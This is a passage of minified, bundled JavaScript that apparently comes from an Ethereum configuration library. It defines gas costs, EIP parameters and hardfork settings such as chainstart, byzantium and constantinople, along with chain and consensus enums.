                                ],
                                [
                                    114,
                                    185
                                ],
                                [
                                    115,
                                    184
                                ],
                                [
                                    116,
                                    183
                                ],
                                [
                                    117,
                                    182
                                ],
                                [
                                    118,
                                    182
                                ],
                                [
                                    119,
                                    181
                                ],
                                [
                                    120,
                                    180
                                ],
                                [
                                    121,
                                    179
                                ],
                                [
                                    122,
                                    179
                                ],
                                [
                                    123,
                                    178
                                ],
                                [
                                    124,
                                    177
                                ],
                                [
                                    125,
                                    176
                                ],
                                [
                                    126,
                                    176
                                ],
                                [
                                    127,
                                    175
                                ],
                                [
                                    128,
                                    174
                                ]
                            ],
                            d: "Discount gas costs of calls to the MultiExp precompiles with `k` (point, scalar) pair"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            6906: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2565",
                    number: 2565,
                    comment: "ModExp gas cost",
                    url: "https://eips.ethereum.org/EIPS/eip-2565",
                    status: "Final",
                    minimumHardfork: "byzantium",
                    gasConfig: {},
                    gasPrices: {
                        modexpGquaddivisor: {
                            v: 3,
                            d: "Gquaddivisor from modexp precompile for gas calculation"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            3399: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2718",
                    comment: "Typed Transaction Envelope",
                    url: "https://eips.ethereum.org/EIPS/eip-2718",
                    status: "Final",
                    minimumHardfork: "chainstart",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            7387: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2929",
                    comment: "Gas cost increases for state access opcodes",
                    url: "https://eips.ethereum.org/EIPS/eip-2929",
                    status: "Final",
                    minimumHardfork: "chainstart",
                    gasConfig: {},
                    gasPrices: {
                        coldsload: {
                            v: 2100,
                            d: "Gas cost of the first read of storage from a given location (per transaction)"
                        },
                        coldaccountaccess: {
                            v: 2600,
                            d: "Gas cost of the first read of a given address (per transaction)"
                        },
                        warmstorageread: {
                            v: 100,
                            d: "Gas cost of reading storage locations which have already loaded 'cold'"
                        },
                        sstoreCleanGasEIP2200: {
                            v: 2900,
                            d: "Once per SSTORE operation from clean non-zero to something else"
                        },
                        sstoreNoopGasEIP2200: {
                            v: 100,
                            d: "Once per SSTORE operation if the value doesn't change"
                        },
                        sstoreDirtyGasEIP2200: {
                            v: 100,
                            d: "Once per SSTORE operation if a dirty value is changed"
                        },
                        sstoreInitRefundEIP2200: {
                            v: 19900,
                            d: "Once per SSTORE operation for resetting to the original zero value"
                        },
                        sstoreCleanRefundEIP2200: {
                            v: 4900,
                            d: "Once per SSTORE operation for resetting to the original non-zero value"
                        },
                        call: {
                            v: 0,
                            d: "Base fee of the CALL opcode"
                        },
                        callcode: {
                            v: 0,
                            d: "Base fee of the CALLCODE opcode"
                        },
                        delegatecall: {
                            v: 0,
                            d: "Base fee of the DELEGATECALL opcode"
                        },
                        staticcall: {
                            v: 0,
                            d: "Base fee of the STATICCALL opcode"
                        },
                        balance: {
                            v: 0,
                            d: "Base fee of the BALANCE opcode"
                        },
                        extcodesize: {
                            v: 0,
                            d: "Base fee of the EXTCODESIZE opcode"
                        },
                        extcodecopy: {
                            v: 0,
                            d: "Base fee of the EXTCODECOPY opcode"
                        },
                        extcodehash: {
                            v: 0,
                            d: "Base fee of the EXTCODEHASH opcode"
                        },
                        sload: {
                            v: 0,
                            d: "Base fee of the SLOAD opcode"
                        },
                        sstore: {
                            v: 0,
                            d: "Base fee of the SSTORE opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            6299: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2930",
                    comment: "Optional access lists",
                    url: "https://eips.ethereum.org/EIPS/eip-2930",
                    status: "Final",
                    minimumHardfork: "istanbul",
                    requiredEIPs: [
                        2718,
                        2929
                    ],
                    gasConfig: {},
                    gasPrices: {
                        accessListStorageKeyCost: {
                            v: 1900,
                            d: "Gas cost per storage key in an Access List transaction"
                        },
                        accessListAddressCost: {
                            v: 2400,
                            d: "Gas cost per storage key in an Access List transaction"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            1073: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3198",
                    number: 3198,
                    comment: "BASEFEE opcode",
                    url: "https://eips.ethereum.org/EIPS/eip-3198",
                    status: "Final",
                    minimumHardfork: "london",
                    gasConfig: {},
                    gasPrices: {
                        basefee: {
                            v: 2,
                            d: "Gas cost of the BASEFEE opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            634: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3529",
                    comment: "Reduction in refunds",
                    url: "https://eips.ethereum.org/EIPS/eip-3529",
                    status: "Final",
                    minimumHardfork: "berlin",
                    requiredEIPs: [
                        2929
                    ],
                    gasConfig: {
                        maxRefundQuotient: {
                            v: 5,
                            d: "Maximum refund quotient; max tx refund is min(tx.gasUsed/maxRefundQuotient, tx.gasRefund)"
                        }
                    },
                    gasPrices: {
                        selfdestructRefund: {
                            v: 0,
                            d: "Refunded following a selfdestruct operation"
                        },
                        sstoreClearRefundEIP2200: {
                            v: 4800,
                            d: "Once per SSTORE operation for clearing an originally existing storage slot"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            3829: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3540",
                    number: 3540,
                    comment: "EVM Object Format (EOF) v1",
                    url: "https://eips.ethereum.org/EIPS/eip-3540",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [
                        3541
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            5729: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3541",
                    comment: "Reject new contracts starting with the 0xEF byte",
                    url: "https://eips.ethereum.org/EIPS/eip-3541",
                    status: "Final",
                    minimumHardfork: "berlin",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            8958: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3554",
                    comment: "Reduction in refunds",
                    url: "Difficulty Bomb Delay to December 1st 2021",
                    status: "Final",
                    minimumHardfork: "muirGlacier",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 95e5,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            8334: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3607",
                    number: 3607,
                    comment: "Reject transactions from senders with deployed code",
                    url: "https://eips.ethereum.org/EIPS/eip-3607",
                    status: "Final",
                    minimumHardfork: "chainstart",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            3412: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3651",
                    number: 3198,
                    comment: "Warm COINBASE",
                    url: "https://eips.ethereum.org/EIPS/eip-3651",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [
                        2929
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            6337: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3670",
                    number: 3670,
                    comment: "EOF - Code Validation",
                    url: "https://eips.ethereum.org/EIPS/eip-3670",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [
                        3540
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            2610: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3675",
                    number: 3675,
                    comment: "Upgrade consensus to Proof-of-Stake",
                    url: "https://eips.ethereum.org/EIPS/eip-3675",
                    status: "Final",
                    minimumHardfork: "london",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            7619: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3855",
                    number: 3855,
                    comment: "PUSH0 instruction",
                    url: "https://eips.ethereum.org/EIPS/eip-3855",
                    status: "Review",
                    minimumHardfork: "chainstart",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {
                        push0: {
                            v: 2,
                            d: "Base fee of the PUSH0 opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            8018: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3860",
                    number: 3860,
                    comment: "Limit and meter initcode",
                    url: "https://eips.ethereum.org/EIPS/eip-3860",
                    status: "Review",
                    minimumHardfork: "spuriousDragon",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {
                        initCodeWordCost: {
                            v: 2,
                            d: "Gas to pay for each word (32 bytes) of initcode when creating a contract"
                        }
                    },
                    vm: {
                        maxInitCodeSize: {
                            v: 49152,
                            d: "Maximum length of initialization code when creating a contract"
                        }
                    },
                    pow: {}
                };
            },
            6779: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-4345",
                    number: 4345,
                    comment: "Difficulty Bomb Delay to June 2022",
                    url: "https://eips.ethereum.org/EIPS/eip-4345",
                    status: "Final",
                    minimumHardfork: "london",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 107e5,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            623: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-4399",
                    number: 4399,
                    comment: "Supplant DIFFICULTY opcode with PREVRANDAO",
                    url: "https://eips.ethereum.org/EIPS/eip-4399",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            797: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-5133",
                    number: 5133,
                    comment: "Delaying Difficulty Bomb to mid-September 2022",
                    url: "https://eips.ethereum.org/EIPS/eip-5133",
                    status: "Draft",
                    minimumHardfork: "grayGlacier",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 114e5,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            5257: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.EIPs = void 0;
                const i = n(r(2819)), o = n(r(4013)), s = n(r(1933)), a = n(r(4638)), u = n(r(6906)), c = n(r(3399)), l = n(r(7387)), d = n(r(6299)), h = n(r(1073)), f = n(r(634)), p = n(r(3829)), m = n(r(5729)), g = n(r(8958)), y = n(r(8334)), v = n(r(3412)), b = n(r(6337)), E = n(r(2610)), A = n(r(7619)), _ = n(r(8018)), w = n(r(6779)), T = n(r(623)), R = n(r(797));
                t.EIPs = {
                    1153: i.default,
                    1559: o.default,
                    2315: s.default,
                    2537: a.default,
                    2565: u.default,
                    2718: c.default,
                    2929: l.default,
                    2930: d.default,
                    3198: h.default,
                    3529: f.default,
                    3540: p.default,
                    3541: m.default,
                    3554: g.default,
                    3607: y.default,
                    3651: v.default,
                    3670: b.default,
                    3675: E.default,
                    3855: A.default,
                    3860: _.default,
                    4345: w.default,
                    4399: T.default,
                    5133: R.default
                };
            },
            4443: (e, t)=>{
                "use strict";
                var r, n, i, o, s;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.CustomChain = t.ConsensusAlgorithm = t.ConsensusType = t.Hardfork = t.Chain = void 0, (s = t.Chain || (t.Chain = {}))[s.Mainnet = 1] = "Mainnet", s[s.Goerli = 5] = "Goerli", s[s.Sepolia = 11155111] = "Sepolia", (o = t.Hardfork || (t.Hardfork = {})).Chainstart = "chainstart", o.Homestead = "homestead", o.Dao = "dao", o.TangerineWhistle = "tangerineWhistle", o.SpuriousDragon = "spuriousDragon", o.Byzantium = "byzantium", o.Constantinople = "constantinople", o.Petersburg = "petersburg", o.Istanbul = "istanbul", o.MuirGlacier = "muirGlacier", o.Berlin = "berlin", o.London = "london", o.ArrowGlacier = "arrowGlacier", o.GrayGlacier = "grayGlacier", o.MergeForkIdTransition = "mergeForkIdTransition", o.Merge = "merge", o.Shanghai = "shanghai", o.ShardingForkDev = "shardingFork", (i = t.ConsensusType || (t.ConsensusType = {})).ProofOfStake = "pos", i.ProofOfWork = "pow", i.ProofOfAuthority = "poa", (n = t.ConsensusAlgorithm || (t.ConsensusAlgorithm = {})).Ethash = "ethash", n.Clique = "clique", n.Casper = "casper", (r = t.CustomChain || (t.CustomChain = {})).PolygonMainnet = "polygon-mainnet", r.PolygonMumbai = "polygon-mumbai", r.ArbitrumRinkebyTestnet = "arbitrum-rinkeby-testnet", r.ArbitrumOne = "arbitrum-one", r.xDaiChain = "x-dai-chain", r.OptimisticKovan = "optimistic-kovan", r.OptimisticEthereum = "optimistic-ethereum";
            },
            3923: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "arrowGlacier",
                    comment: "HF to delay the difficulty bomb",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/arrow-glacier.md",
                    status: "Final",
                    eips: [
                        4345
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            9126: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "berlin",
                    comment: "HF targeted for July 2020 following the Muir Glacier HF",
                    url: "https://eips.ethereum.org/EIPS/eip-2070",
                    status: "Final",
                    eips: [
                        2565,
                        2929,
                        2718,
                        2930
                    ]
                };
            },
            7251: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "byzantium",
                    comment: "Hardfork with new precompiles, instructions and other protocol changes",
                    url: "https://eips.ethereum.org/EIPS/eip-609",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        modexpGquaddivisor: {
                            v: 20,
                            d: "Gquaddivisor from modexp precompile for gas calculation"
                        },
                        ecAdd: {
                            v: 500,
                            d: "Gas costs for curve addition precompile"
                        },
                        ecMul: {
                            v: 4e4,
                            d: "Gas costs for curve multiplication precompile"
                        },
                        ecPairing: {
                            v: 1e5,
                            d: "Base gas costs for curve pairing precompile"
                        },
                        ecPairingWord: {
                            v: 8e4,
                            d: "Gas costs regarding curve pairing precompile input length"
                        },
                        revert: {
                            v: 0,
                            d: "Base fee of the REVERT opcode"
                        },
                        staticcall: {
                            v: 700,
                            d: "Base fee of the STATICCALL opcode"
                        },
                        returndatasize: {
                            v: 2,
                            d: "Base fee of the RETURNDATASIZE opcode"
                        },
                        returndatacopy: {
                            v: 3,
                            d: "Base fee of the RETURNDATACOPY opcode"
                        }
                    },
                    vm: {},
                    pow: {
                        minerReward: {
                            v: "3000000000000000000",
                            d: "the amount a miner get rewarded for mining a block"
                        },
                        difficultyBombDelay: {
                            v: 3e6,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            9454: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "chainstart",
                    comment: "Start of the Ethereum main chain",
                    url: "",
                    status: "",
                    gasConfig: {
                        minGasLimit: {
                            v: 5e3,
                            d: "Minimum the gas limit may ever be"
                        },
                        gasLimitBoundDivisor: {
                            v: 1024,
                            d: "The bound divisor of the gas limit, used in update calculations"
                        },
                        maxRefundQuotient: {
                            v: 2,
                            d: "Maximum refund quotient; max tx refund is min(tx.gasUsed/maxRefundQuotient, tx.gasRefund)"
                        }
                    },
                    gasPrices: {
                        base: {
                            v: 2,
                            d: "Gas base cost, used e.g. for ChainID opcode (Istanbul)"
                        },
                        tierStep: {
                            v: [
                                0,
                                2,
                                3,
                                5,
                                8,
                                10,
                                20
                            ],
                            d: "Once per operation, for a selection of them"
                        },
                        exp: {
                            v: 10,
                            d: "Base fee of the EXP opcode"
                        },
                        expByte: {
                            v: 10,
                            d: "Times ceil(log256(exponent)) for the EXP instruction"
                        },
                        sha3: {
                            v: 30,
                            d: "Base fee of the SHA3 opcode"
                        },
                        sha3Word: {
                            v: 6,
                            d: "Once per word of the SHA3 operation's data"
                        },
                        sload: {
                            v: 50,
                            d: "Base fee of the SLOAD opcode"
                        },
                        sstoreSet: {
                            v: 2e4,
                            d: "Once per SSTORE operation if the zeroness changes from zero"
                        },
                        sstoreReset: {
                            v: 5e3,
                            d: "Once per SSTORE operation if the zeroness does not change from zero"
                        },
                        sstoreRefund: {
                            v: 15e3,
                            d: "Once per SSTORE operation if the zeroness changes to zero"
                        },
                        jumpdest: {
                            v: 1,
                            d: "Base fee of the JUMPDEST opcode"
                        },
                        log: {
                            v: 375,
                            d: "Base fee of the LOG opcode"
                        },
                        logData: {
                            v: 8,
                            d: "Per byte in a LOG* operation's data"
                        },
                        logTopic: {
                            v: 375,
                            d: "Multiplied by the * of the LOG*, per LOG transaction. e.g. LOG0 incurs 0 * c_txLogTopicGas, LOG4 incurs 4 * c_txLogTopicGas"
                        },
                        create: {
                            v: 32e3,
                            d: "Base fee of the CREATE opcode"
                        },
                        call: {
                            v: 40,
                            d: "Base fee of the CALL opcode"
                        },
                        callStipend: {
                            v: 2300,
                            d: "Free gas given at beginning of call"
                        },
                        callValueTransfer: {
                            v: 9e3,
                            d: "Paid for CALL when the value transfor is non-zero"
                        },
                        callNewAccount: {
                            v: 25e3,
                            d: "Paid for CALL when the destination address didn't exist prior"
                        },
                        selfdestructRefund: {
                            v: 24e3,
                            d: "Refunded following a selfdestruct operation"
                        },
                        memory: {
                            v: 3,
                            d: "Times the address of the (highest referenced byte in memory + 1). NOTE: referencing happens on read, write and in instructions such as RETURN and CALL"
                        },
                        quadCoeffDiv: {
                            v: 512,
                            d: "Divisor for the quadratic particle of the memory cost equation"
                        },
                        createData: {
                            v: 200,
                            d: ""
                        },
                        tx: {
                            v: 21e3,
                            d: "Per transaction. NOTE: Not payable on data of calls between transactions"
                        },
                        txCreation: {
                            v: 32e3,
                            d: "The cost of creating a contract via tx"
                        },
                        txDataZero: {
                            v: 4,
                            d: "Per byte of data attached to a transaction that equals zero. NOTE: Not payable on data of calls between transactions"
                        },
                        txDataNonZero: {
                            v: 68,
                            d: "Per byte of data attached to a transaction that is not equal to zero. NOTE: Not payable on data of calls between transactions"
                        },
                        copy: {
                            v: 3,
                            d: "Multiplied by the number of 32-byte words that are copied (round up) for any *COPY operation and added"
                        },
                        ecRecover: {
                            v: 3e3,
                            d: ""
                        },
                        sha256: {
                            v: 60,
                            d: ""
                        },
                        sha256Word: {
                            v: 12,
                            d: ""
                        },
                        ripemd160: {
                            v: 600,
                            d: ""
                        },
                        ripemd160Word: {
                            v: 120,
                            d: ""
                        },
                        identity: {
                            v: 15,
                            d: ""
                        },
                        identityWord: {
                            v: 3,
                            d: ""
                        },
                        stop: {
                            v: 0,
                            d: "Base fee of the STOP opcode"
                        },
                        add: {
                            v: 3,
                            d: "Base fee of the ADD opcode"
                        },
                        mul: {
                            v: 5,
                            d: "Base fee of the MUL opcode"
                        },
                        sub: {
                            v: 3,
                            d: "Base fee of the SUB opcode"
                        },
                        div: {
                            v: 5,
                            d: "Base fee of the DIV opcode"
                        },
                        sdiv: {
                            v: 5,
                            d: "Base fee of the SDIV opcode"
                        },
                        mod: {
                            v: 5,
                            d: "Base fee of the MOD opcode"
                        },
                        smod: {
                            v: 5,
                            d: "Base fee of the SMOD opcode"
                        },
                        addmod: {
                            v: 8,
                            d: "Base fee of the ADDMOD opcode"
                        },
                        mulmod: {
                            v: 8,
                            d: "Base fee of the MULMOD opcode"
                        },
                        signextend: {
                            v: 5,
                            d: "Base fee of the SIGNEXTEND opcode"
                        },
                        lt: {
                            v: 3,
                            d: "Base fee of the LT opcode"
                        },
                        gt: {
                            v: 3,
                            d: "Base fee of the GT opcode"
                        },
                        slt: {
                            v: 3,
                            d: "Base fee of the SLT opcode"
                        },
                        sgt: {
                            v: 3,
                            d: "Base fee of the SGT opcode"
                        },
                        eq: {
                            v: 3,
                            d: "Base fee of the EQ opcode"
                        },
                        iszero: {
                            v: 3,
                            d: "Base fee of the ISZERO opcode"
                        },
                        and: {
                            v: 3,
                            d: "Base fee of the AND opcode"
                        },
                        or: {
                            v: 3,
                            d: "Base fee of the OR opcode"
                        },
                        xor: {
                            v: 3,
                            d: "Base fee of the XOR opcode"
                        },
                        not: {
                            v: 3,
                            d: "Base fee of the NOT opcode"
                        },
                        byte: {
                            v: 3,
                            d: "Base fee of the BYTE opcode"
                        },
                        address: {
                            v: 2,
                            d: "Base fee of the ADDRESS opcode"
                        },
                        balance: {
                            v: 20,
                            d: "Base fee of the BALANCE opcode"
                        },
                        origin: {
                            v: 2,
                            d: "Base fee of the ORIGIN opcode"
                        },
                        caller: {
                            v: 2,
                            d: "Base fee of the CALLER opcode"
                        },
                        callvalue: {
                            v: 2,
                            d: "Base fee of the CALLVALUE opcode"
                        },
                        calldataload: {
                            v: 3,
                            d: "Base fee of the CALLDATALOAD opcode"
                        },
                        calldatasize: {
                            v: 2,
                            d: "Base fee of the CALLDATASIZE opcode"
                        },
                        calldatacopy: {
                            v: 3,
                            d: "Base fee of the CALLDATACOPY opcode"
                        },
                        codesize: {
                            v: 2,
                            d: "Base fee of the CODESIZE opcode"
                        },
                        codecopy: {
                            v: 3,
                            d: "Base fee of the CODECOPY opcode"
                        },
                        gasprice: {
                            v: 2,
                            d: "Base fee of the GASPRICE opcode"
                        },
                        extcodesize: {
                            v: 20,
                            d: "Base fee of the EXTCODESIZE opcode"
                        },
                        extcodecopy: {
                            v: 20,
                            d: "Base fee of the EXTCODECOPY opcode"
                        },
                        blockhash: {
                            v: 20,
                            d: "Base fee of the BLOCKHASH opcode"
                        },
                        coinbase: {
                            v: 2,
                            d: "Base fee of the COINBASE opcode"
                        },
                        timestamp: {
                            v: 2,
                            d: "Base fee of the TIMESTAMP opcode"
                        },
                        number: {
                            v: 2,
                            d: "Base fee of the NUMBER opcode"
                        },
                        difficulty: {
                            v: 2,
                            d: "Base fee of the DIFFICULTY opcode"
                        },
                        gaslimit: {
                            v: 2,
                            d: "Base fee of the GASLIMIT opcode"
                        },
                        pop: {
                            v: 2,
                            d: "Base fee of the POP opcode"
                        },
                        mload: {
                            v: 3,
                            d: "Base fee of the MLOAD opcode"
                        },
                        mstore: {
                            v: 3,
                            d: "Base fee of the MSTORE opcode"
                        },
                        mstore8: {
                            v: 3,
                            d: "Base fee of the MSTORE8 opcode"
                        },
                        sstore: {
                            v: 0,
                            d: "Base fee of the SSTORE opcode"
                        },
                        jump: {
                            v: 8,
                            d: "Base fee of the JUMP opcode"
                        },
                        jumpi: {
                            v: 10,
                            d: "Base fee of the JUMPI opcode"
                        },
                        pc: {
                            v: 2,
                            d: "Base fee of the PC opcode"
                        },
                        msize: {
                            v: 2,
                            d: "Base fee of the MSIZE opcode"
                        },
                        gas: {
                            v: 2,
                            d: "Base fee of the GAS opcode"
                        },
                        push: {
                            v: 3,
                            d: "Base fee of the PUSH opcode"
                        },
                        dup: {
                            v: 3,
                            d: "Base fee of the DUP opcode"
                        },
                        swap: {
                            v: 3,
                            d: "Base fee of the SWAP opcode"
                        },
                        callcode: {
                            v: 40,
                            d: "Base fee of the CALLCODE opcode"
                        },
                        return: {
                            v: 0,
                            d: "Base fee of the RETURN opcode"
                        },
                        invalid: {
                            v: 0,
                            d: "Base fee of the INVALID opcode"
                        },
                        selfdestruct: {
                            v: 0,
                            d: "Base fee of the SELFDESTRUCT opcode"
                        }
                    },
                    vm: {
                        stackLimit: {
                            v: 1024,
                            d: "Maximum size of VM stack allowed"
                        },
                        callCreateDepth: {
                            v: 1024,
                            d: "Maximum depth of call/create stack"
                        },
                        maxExtraDataSize: {
                            v: 32,
                            d: "Maximum size extra data may be after Genesis"
                        }
                    },
                    pow: {
                        minimumDifficulty: {
                            v: 131072,
                            d: "The minimum that the difficulty may ever be"
                        },
                        difficultyBoundDivisor: {
                            v: 2048,
                            d: "The bound divisor of the difficulty, used in the update calculations"
                        },
                        durationLimit: {
                            v: 13,
                            d: "The decision boundary on the blocktime duration used to determine whether difficulty should go up or not"
                        },
                        epochDuration: {
                            v: 3e4,
                            d: "Duration between proof-of-work epochs"
                        },
                        timebombPeriod: {
                            v: 1e5,
                            d: "Exponential difficulty timebomb period"
                        },
                        minerReward: {
                            v: "5000000000000000000",
                            d: "the amount a miner get rewarded for mining a block"
                        },
                        difficultyBombDelay: {
                            v: 0,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            1353: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "constantinople",
                    comment: "Postponed hardfork including EIP-1283 (SSTORE gas metering changes)",
                    url: "https://eips.ethereum.org/EIPS/eip-1013",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        netSstoreNoopGas: {
                            v: 200,
                            d: "Once per SSTORE operation if the value doesn't change"
                        },
                        netSstoreInitGas: {
                            v: 2e4,
                            d: "Once per SSTORE operation from clean zero"
                        },
                        netSstoreCleanGas: {
                            v: 5e3,
                            d: "Once per SSTORE operation from clean non-zero"
                        },
                        netSstoreDirtyGas: {
                            v: 200,
                            d: "Once per SSTORE operation from dirty"
                        },
                        netSstoreClearRefund: {
                            v: 15e3,
                            d: "Once per SSTORE operation for clearing an originally existing storage slot"
                        },
                        netSstoreResetRefund: {
                            v: 4800,
                            d: "Once per SSTORE operation for resetting to the original non-zero value"
                        },
                        netSstoreResetClearRefund: {
                            v: 19800,
                            d: "Once per SSTORE operation for resetting to the original zero value"
                        },
                        shl: {
                            v: 3,
                            d: "Base fee of the SHL opcode"
                        },
                        shr: {
                            v: 3,
                            d: "Base fee of the SHR opcode"
                        },
                        sar: {
                            v: 3,
                            d: "Base fee of the SAR opcode"
                        },
                        extcodehash: {
                            v: 400,
                            d: "Base fee of the EXTCODEHASH opcode"
                        },
                        create2: {
                            v: 32e3,
                            d: "Base fee of the CREATE2 opcode"
                        }
                    },
                    vm: {},
                    pow: {
                        minerReward: {
                            v: "2000000000000000000",
                            d: "The amount a miner gets rewarded for mining a block"
                        },
                        difficultyBombDelay: {
                            v: 5e6,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            3810: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "dao",
                    comment: "DAO rescue hardfork",
                    url: "https://eips.ethereum.org/EIPS/eip-779",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            6257: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "grayGlacier",
                    comment: "Delaying the difficulty bomb to Mid September 2022",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/gray-glacier.md",
                    status: "Draft",
                    eips: [
                        5133
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            7446: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "homestead",
                    comment: "Homestead hardfork with protocol and network changes",
                    url: "https://eips.ethereum.org/EIPS/eip-606",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        delegatecall: {
                            v: 40,
                            d: "Base fee of the DELEGATECALL opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            9137: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hardforks = void 0;
                const i = n(r(9454)), o = n(r(3810)), s = n(r(7446)), a = n(r(7458)), u = n(r(2546)), c = n(r(7251)), l = n(r(1353)), d = n(r(5338)), h = n(r(9597)), f = n(r(7931)), p = n(r(9126)), m = n(r(1233)), g = n(r(2761)), y = n(r(3923)), v = n(r(6257)), b = n(r(6697)), E = n(r(6668));
                t.hardforks = {
                    chainstart: i.default,
                    homestead: s.default,
                    dao: o.default,
                    tangerineWhistle: a.default,
                    spuriousDragon: u.default,
                    byzantium: c.default,
                    constantinople: l.default,
                    petersburg: d.default,
                    istanbul: h.default,
                    muirGlacier: f.default,
                    berlin: p.default,
                    london: m.default,
                    shanghai: g.default,
                    arrowGlacier: y.default,
                    grayGlacier: v.default,
                    mergeForkIdTransition: b.default,
                    merge: E.default
                };
            },
            9597: (e, t)=>{
                "use strict";
